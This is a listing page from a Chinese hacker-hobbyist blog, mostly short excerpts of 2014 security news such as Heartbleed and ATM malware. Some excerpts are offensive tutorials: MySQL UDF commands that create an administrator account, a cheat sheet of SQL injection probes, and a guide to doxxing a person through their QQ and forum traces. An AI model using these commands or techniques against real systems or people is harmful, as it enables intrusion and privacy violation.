七行者博客 - 关注网络安全,黑客技术爱好者

  • “心脏出血”证实波及手机 安天推出检测插件

    “心脏出血”证实波及手机 安天推出检测插件
      OpenSSL“心脏出血”漏洞的严重性远比想象的严重。一些用户没有考虑到,手机上大量应用也需要账号登录,其登录服务也有很多是OpenSSL搭建的,因此在漏洞没有修补好之前,用手机登录过网银、网购等重要账号极容易导致用户账户信息丢失。需要在漏洞修补后及时更改密码。   安天旗下AVL移动安全团队在“漏洞”消息爆出后,迅速对主流的网银、网购、证券、航旅软件的登录入口...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:漏洞公布, 网络安全 | 1条评论
    阅读全文

  • OpenSSL漏洞转攻个人电脑 360首推修复方案

    OpenSSL漏洞转攻个人电脑 360首推修复方案
             OpenSSL“心脏出血”漏洞危害辐射范围正在不断扩大。在思科、Juniper网络设备被曝受此漏洞影响后,Windows上大批软件也被发现存在漏洞,可被黑客利用攻击网民电脑,抓取密钥等隐私数据,而攻击代码已在国外技术网站GitHub上公开。对此360安全卫士于10日晚间紧急推出漏洞修复方案,是目前唯一可预防此漏洞的PC安全软件。  “心脏出血”漏洞刚刚曝出时,黑客主要攻击的...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:漏洞公布, 网络安全 | 2条评论
    阅读全文

  • “心脏出血”:你需要尽快更改这些密码

    “心脏出血”:你需要尽快更改这些密码
    “Heartbleed”是什么?“心脏出血”漏洞,OpenSSL有史以来最具灾难性的一个漏洞,可能已经被发现和利用2年之久,前几天才公布,过多的不介绍了,知道严重性就行。 这个漏洞将影响所有使用https加密协议的网站和服务,包括且不仅包括Gmail和Facebook——这些网站可能已经被恶意人士监听,从而获取到你的重要信息,包括且不仅包括账号、密码、信用卡号密码等。 我们也不知道究竟有...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:安全知识, 漏洞公布, 网络安全 | 暂无评论
    阅读全文

  • mysql提权方法总结四则

    mysql提权方法总结四则
    一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’  select cmdshell(’net user iis_user /add’);  select cmdshell(’net localgroup administrators iis_user /add’);  select cmdshell(’regedit /s d:\web\3389.reg’);  drop function cmdshell;  select cmdshell(’netstat -an’); 二 ...阅读全文
    作者:qxz_xp | 发布:2014年4月06日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 手工注入命令总汇

    手工注入命令总汇
    1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统  ;and (select count(*) from sysobjects)>0 mssql  ;and (select count(*) from msysobjects)>0 access 6.猜数据库;and (select Co...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:菜鸟入门, 黑客攻防 | 1条评论
    阅读全文

  • 电脑硬盘故障提示信息详细说明

    电脑硬盘故障提示信息详细说明
    一 硬盘故障提示信息的含义   (1)Date error(数据错误)   从软盘或硬盘上读取的数据存在不可修复错误,磁盘上有坏扇区和   坏的文件分配表。   (2)Hard disk configuration error(硬盘配置错误)   硬盘配置不正确,跳线不对,硬盘参数设置不正确等。   (3)Hard disk controller failure(硬盘控制器失效)   控制器卡(多功能卡)松动,连线不对,...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:其它技术, 电脑维修 | 暂无评论
    阅读全文

  • 黑客发个短信就能从ATM机取钱

    黑客发个短信就能从ATM机取钱
          来自赛门铁克(Symantec)最新披露的消息,黑客能够通过发送短信从ATM机获取到现金——这是通过首先将恶意程序加载到ATM设备中实现的。在本周一的报道中,赛门铁克将2013年10月在墨西哥爆发的Ploutus恶意程序,通过CD-ROM和USB驱动器就非常轻易地将Ploutus上传到ATM设备中,罪犯要接入这些驱动器首先需要解锁,或者直接在ATM机器外部钻孔。    赛门铁克安全研究人员Dan...阅读全文
    作者:qxz_xp | 发布:2014年3月26日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 黑客传说:他差点儿堵了周鸿祎的发家路

    黑客传说:他差点儿堵了周鸿祎的发家路
    他是全球发现苹果漏洞最多的人 他曾穷的住在小黑屋 他经常接到国家安全部门的电话 他差点堵住周鸿祎的路 无名英雄 我们最终还是没有见到吴石本人,即便他的生意合伙人刘盛(化名)已经应承了帮我们牵线。自打 2010 年他接受了《福布斯》的专访之后,这个四川男人就再也不愿意让自己曝光。 那篇文章其实还算中肯,“在上月的一次安全更新中,苹果针对 iPhone 操作系统发布...阅读全文
    作者:qxz_xp | 发布:2014年3月26日 | 分类:业界新闻, 黑客攻防 | 2条评论
    阅读全文

  • 无需工具秒破网页上的星号密码(代码法)

    无需工具秒破网页上的星号密码(代码法)
    浏览器会记住你输入的密码本来没有什么好怕的,但是人天生就是懒的,“记住密码”用多了也就直接导致了你记不住密码了。虽然在网页中记住密码功能大部分调用 cookies 或者是储存在浏览器记录中,并且有大量的类似软件可以读取其中的密码,但是感觉很不安全和方便,如果用软件你并不能够保证软件有没有后门,如果自己去找 cookies 进行密码的找回 cookies 又大多加密或者很难找...阅读全文
    作者:qxz_xp | 发布:2014年3月25日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 人肉搜索的基本方法分享

    人肉搜索的基本方法分享
    1.BaiDu或Google搜目标的QQ号,常用ID,电话号码等等与之有关的 可以得到一些有用信息后在加以扩大搜索范围 2.完成第1步时基本会出现一些有用信息比如:贴吧里可以得到 IP地址,毕业学校,出生日期,爱好的游戏,邮件地址等等…贴吧是个好东西 3.通过QQ空间,其它交友博客可以得到兴趣爱好或者照片,出生日期,邮件地址,姓名 注意留言板和说说里面和目标比较熟悉或者暧...阅读全文
    作者:qxz_xp | 发布:2014年3月20日 | 分类:社工相关, 黑客攻防 | 1条评论
    阅读全文

  • 网络专家呼吁警惕黑客借马航消息传播电脑病毒

    网络专家呼吁警惕黑客借马航消息传播电脑病毒
    【环球网综合报道】马航MH370航班的消息近日是人们关注的焦点,许多人通过网络了解调查的最新动向。据马来西亚《光明日报》3月18日报道,有网络专家警告,在社交网上大量出现的马航客机的“惊人”消息,都是黑客发出的陷阱。 据报道,这些虚假的新闻都以“发现失踪MH370”来吸引用户眼球,如“50名乘客在海上获救”、“飞机在百慕达三角被发现”等,消息链接中藏有计算机病毒,用户...阅读全文
    作者:qxz_xp | 发布:2014年3月19日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • Google Play遭遇黑客攻击 系统两次崩溃

    Google Play遭遇黑客攻击 系统两次崩溃
    近日,一名黑客攻击了Google Play的应用程序发布系统,导致该系统被封锁,不能上传和更新应用程序。 周一,一名黑客攻击了Google Play(谷歌商店)的应用程序发布系统,导致该系统被封锁,不能上传和更新应用程序。 这是一个许多用户可能没有注意到运行故障,除非用户发现自己突然无法更新《糖果粉碎传奇》(Candy Crush)或者《植物大战僵尸》(Plants v. Zombies)等游戏。但谷...阅读全文
    作者:qxz_xp | 发布:2014年3月19日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文